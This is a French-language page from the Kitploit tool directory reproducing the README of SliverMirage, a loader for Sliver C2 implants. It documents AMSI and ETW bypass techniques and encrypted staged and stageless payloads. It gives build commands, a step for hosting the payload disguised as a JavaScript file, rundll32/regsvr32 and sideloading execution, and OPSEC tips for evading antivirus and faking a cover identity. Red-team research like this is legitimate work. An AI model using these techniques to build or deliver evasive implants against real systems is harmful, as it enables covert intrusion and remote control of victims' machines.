Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
SliverMirage — Chargeur PICO Crystal Palace pour Sliver C2 contournement d'AMSI à double couche, silenciation d'ETW, payloads chiffrés en AES-256-CBC, 6 variantes de livraison | Kitploit
Outils/GitHubGitHub/daniomass/slivermirage
ExploitationPost-ExploitationAnalyse de MalwareCommandement et ContrôleAnalyse de BinairesRed TeamingDéveloppement de Charges Utiles
GitHubdaniomass/slivermirage

SliverMirage

Chargeur PICO Crystal Palace pour Sliver C2 contournement d'AMSI à double couche, silenciation d'ETW, payloads chiffrés en AES-256-CBC, 6 variantes de livraison

Voir le dépôt
154il y a 5 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

SliverMirage

Un fork de CrystalSliver, étendant le chargeur PICO de Crystal Palace avec un contournement AMSI à deux couches, la neutralisation d'ETW et six variantes de livraison pour Sliver C2.

Ce qu'il fait

SliverMirage encapsule une DLL d'implant Sliver via la virtualisation PICO de Crystal Palace, puis la livre via un chargeur qui neutralise AMSI et ETW sans patcher amsi.dll ni ntdll.dll.

Pile de contournement :

CoucheTechniqueDétail
AMSI L1Corruption de chaîne CLRLdrRegisterDllNotification intercepte le chargement de clr.dll, corrompt AmsiScanBuffer dans .rdata avant que le CLR n'appelle GetProcAddress
AMSI L2VEH + HWBPLe gestionnaire d'exceptions vecteur sur AmsiScanBuffer retourne E_INVALIDARG
ETWHWBPDR1 sur NtTraceControl, retourne STATUS_SUCCESS
PayloadAES-256-CBC + XORDéchiffrement BCrypt, VirtualAlloc(RW) -> VirtualProtect(RX), aucune mémoire RWX
VirtualizationCrystal Palace PICOLa DLL Sliver s'exécute dans un processus PICO, invisible pour l'AV en espace utilisateur

Variantes

FormatFichierLivraisonC2 à l'exécution ?
exeStaged EXEEXE + payload.dat sur le site web C2Oui (HTTPS)
exe-stagelessStageless EXEEXE uniqueNon
dllStageless DLLDLL uniqueNon
dll-stagedStaged DLLDLL + payload.dat sur le site web C2Oui (HTTPS)
shellcodeStaged shellcode.bin + payload.datOui (HTTPS)
shellcode-stagelessStageless shellcode.bin uniqueNon

Les variantes Staged téléchargent le PICO chiffré à l'exécution depuis un site web HTTPS de Sliver. L'EXE/DLL est petit (~20 Ko) et ne contient aucune charge utile sur le disque.

Les variantes Stageless intègrent le PICO chiffré au moment de la compilation (double couche XOR + AES). Plus volumineuses sur le disque mais aucune activité réseau avant le callback du beacon.

Démarrage rapide

Prérequis

  • x86_64-w64-mingw32-gcc (mingw-w64)
  • nasm
  • python3 avec pefile (pip install pefile)
  • openssl
  • Java 17 (pour Crystal Palace — installé automatiquement par build.sh)

Compilation avec build.sh (recommandé)

Le script de compilation installe automatiquement les dépendances manquantes (y compris Crystal Palace et Java 17) et gère l'intégralité du pipeline : DLL -> Crystal Palace PICO -> chiffrement -> compilation.

root@kitploit:~
# Staged EXE (default)
./build.sh --dll /path/to/sliver_implant.dll --host 10.0.0.1

# Stageless EXE
./build.sh --dll /path/to/sliver_implant.dll --format exe-stageless

# Stageless DLL
./build.sh --dll /path/to/sliver_implant.dll --format dll

# Staged DLL
./build.sh --dll /path/to/sliver_implant.dll --format dll-staged --host 10.0.0.1

# Shellcode (staged)
./build.sh --dll /path/to/sliver_implant.dll --format shellcode --host 10.0.0.1

# Shellcode (stageless)
./build.sh --dll /path/to/sliver_implant.dll --format shellcode-stageless

Options :

  • --dll <path> — DLL de l'implant Sliver (obligatoire)
  • --host <ip> — IP du serveur C2 (obligatoire pour les formats staged)
  • --port <port> — Port C2 (défaut : 443)
  • --path <path> — Chemin URL pour le téléchargement de la charge utile (défaut : /assets/js/vendor.js)
  • --format <fmt> — Format de sortie (défaut : exe)
  • --export <name> — Nom d'exportation DLL personnalisé

Compilation avec Make (manuel)

Si vous disposez déjà d'un blob PICO Crystal Palace :

root@kitploit:~
# Staged EXE
make PICO=/path/to/implant.crystal.bin C2_HOST=10.0.0.1

# Stageless EXE
make exe-stageless PICO=/path/to/implant.crystal.bin

# Stageless DLL
make dll PICO=/path/to/implant.crystal.bin

# All targets
make clean

Déploiement

Staged (EXE ou DLL)

  1. Téléversez build/payload.dat vers un site web HTTPS Sliver :

    root@kitploit:~
    sliver > websites add-content --website cover \
      --web-path /assets/js/vendor.js \
      --content-type application/javascript \
      --content build/payload.dat
    
  2. Livrez build/csvchelper.exe (ou .dll) à la cible.

Stageless

Livraison en un seul fichier. Aucun site web C2 à configurer.

Méthodes d'exécution de la DLL

root@kitploit:~
rundll32 csvchelper.dll,StartW
regsvr32 /s csvchelper.dll

Ou utilisez le sideloading de DLL (renommez-la pour qu'elle corresponde à une DLL légitime chargée par l'application cible).

Exports : DllRegisterServer, DllUnregisterServer, StartW, VoidFunc

Structure du projet

root@kitploit:~
SliverMirage/
  loader/                    # Crystal Palace PICO loader (from CrystalSliver)
    src/                     # Loader C sources + draugr ASM
    loader.spec              # Crystal Palace linker spec
    pico.spec                # PICO generation spec
  src/
    stager_remote.c          # Staged EXE
    stager_stageless.c       # Stageless EXE
    stager_remote_dll.c      # Staged DLL
    stager_stageless_dll.c   # Stageless DLL
    stager_debug.c           # Debug EXE (MessageBox diagnostics)
  scripts/
    gen_payload.py           # AES-256-CBC encrypt (staged)
    gen_payload_stageless.py # AES + XOR embed (stageless)
    dll_to_shellcode.py      # sRDI DLL-to-shellcode converter
  resources/
    resource.rc              # Version info (EXE)
    resource_dll.rc          # Version info (DLL)
    manifest.xml             # asInvoker manifest
  libtcg.x64.zip             # TCG library for Crystal Palace
  Makefile
  build.sh

Notes OPSEC

  • IAT propre : uniquement kernel32, advapi32, bcrypt — toutes des API Windows légitimes
  • Aucun patch mémoire : le contournement AMSI/ETW utilise des points d'arrêt matériels, pas VirtualProtect sur les DLL système
  • Pas de RWX : la mémoire de la charge utile passe de RW à RX, jamais RWX
  • Sous-système GUI : point d'entrée WinMain, -mwindows — aucun flash de console
  • Informations de version + manifeste : le manifeste asInvoker intégré supprime les heuristiques UAC
  • Contrôle de l'entropie : les charges utiles stageless utilisent une clé XOR tournante pour réduire l'entropie d'environ ~7,8 à ~6,0-6,5
  • Personnalisez resource.rc / resource_dll.rc avec votre identité de couverture avant la compilation

Avertissement

Ce projet est destiné uniquement à des fins de tests de sécurité autorisés, de recherche et d'éducation. Utilisez-le exclusivement dans des environnements pour lesquels vous disposez d'une autorisation écrite explicite de mener des tests d'intrusion. L'accès non autorisé à des systèmes informatiques est illégal. Les auteurs déclinent toute responsabilité en cas d'utilisation abusive de ce logiciel.

Crédits

  • Crystal Palace par Rasta Mouse — moteur de virtualisation PICO
  • CrystalSliver — intégration originale de Crystal Palace + Sliver
  • sRDI par Nick Landers — technique d'injection de DLL réflexive par shellcode

Licence

MIT

Télécharger l’outil